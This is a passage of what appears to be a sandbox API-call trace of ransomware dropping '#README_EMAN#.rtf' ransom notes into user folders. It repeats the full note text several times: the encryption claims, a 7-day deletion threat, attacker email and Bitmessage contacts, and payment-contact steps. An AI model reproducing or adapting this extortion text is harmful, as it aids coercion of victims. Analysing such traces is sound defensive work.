\\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.205] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.206] CloseHandle (hObject=0x294) returned 1 [0278.206] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#readme_eman#.rtf")) returned 0x20 [0278.206] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0278.206] GetLastError () returned 0x2 [0278.206] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.207] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 